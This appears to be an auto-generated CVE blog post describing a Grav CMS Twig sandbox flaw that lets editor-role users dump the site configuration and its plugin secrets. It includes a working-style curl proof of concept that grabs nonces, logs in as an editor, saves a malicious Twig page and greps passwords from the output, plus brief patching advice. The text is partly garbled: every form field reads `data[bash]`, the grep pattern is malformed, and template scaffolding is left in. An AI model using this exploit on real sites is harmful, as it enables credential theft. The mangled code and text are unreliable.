Listen to this Post
How the mentioned CVE works (around 20 lines):
The Twig sandbox allow-list in `system/config/security.yaml` explicitly permits the `Config::toArray()` method for the `Grav\Common\Config\Config` class. The `config` object holds the entire merged site configuration, including every key under `plugins.` (e.g., SMTP passwords, AWS keys, OAuth secrets). This object is injected into every sandboxed render in `system/src/Grav/Common/Twig/Twig.php` (line 292). Any user with the `admin.pages` role (editor, not administrator) can create or edit a page. By setting `process.twig: true` in the page frontmatter, they enable Twig processing. Then they insert `{{ config.toArray()|json_encode|raw }}` into the page body. When the page is rendered, Twig executes the code, converting the entire config array to JSON and dumping it raw into the HTML. The attacker retrieves that HTML and extracts secrets like `”password”:”…”` from the JSON. No administrator privileges are required. The vulnerability stems from an overly permissive allow-list that exposes a dangerous method (toArray) inside a trusted sandbox. The fix requires removing `toarray` from the allowed methods or sanitizing the config object before injection.
DailyCVE form (3 words max each line):
Platform: Grav CMS
Version: All current versions
Vulnerability: Information disclosure via
Severity: Critical
Date: 2026-05-13
Prediction: 2026-05-27
What Undercode Say:
PoC: Login nonce extraction
NONCE=$(curl -sc /tmp/cookies.txt http://TARGET/admin | grep -oP '(?<=name="login-nonce" value=")[^"]+')
Editor login
curl -sc /tmp/cookies.txt -b /tmp/cookies.txt -X POST http://TARGET/admin --data-urlencode "data[bash]=EDITOR_USER" --data-urlencode "data[bash]=EDITOR_PASS" --data-urlencode "task=login" --data-urlencode "login-nonce=${NONCE}" -o /dev/null
Admin nonce for page save
ADMIN_NONCE=$(curl -s -b /tmp/cookies.txt http://TARGET/admin/pages | grep -oP '(?<=admin-nonce" value=")[^"]+' | head -1)
Save malicious page
curl -s -b /tmp/cookies.txt -X POST http://TARGET/admin/pages/poc --data-urlencode "admin-nonce=${ADMIN_NONCE}" --data-urlencode "task=save" --data-urlencode "data[bash]= poc\nprocess:\n twig: true\npublished: true" --data-urlencode "data[bash]={{ config.toArray()|json_encode|raw }}" --data-urlencode "data[bash]=poc" --data-urlencode "data[bash]=/" --data-urlencode "data[bash]=default" -o /dev/null
Extract secrets
curl -s http://TARGET/poc | grep -o '"password":"[^"]"'
Exploit:
Any editor with `admin.pages` can save a page containing `{{ config.toArray()|json_encode|raw }}` with Twig processing enabled. Visiting that page returns all configuration values, including plugin secrets, as JSON in the HTML source.
Protection from this CVE:
Remove `toarray` from the allowed methods list in `system/config/security.yaml` under Grav\Common\Config\Config. Alternatively, apply a patch that sanitizes the `config` variable before injection into sandboxed Twig templates. Disable Twig processing for untrusted roles.
Impact:
Full exfiltration of all plugin credentials (SMTP passwords, AWS keys, OAuth secrets, API tokens). Each secret compromises its connected service (email, cloud, OAuth, CAPTCHA) without any administrator interaction.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

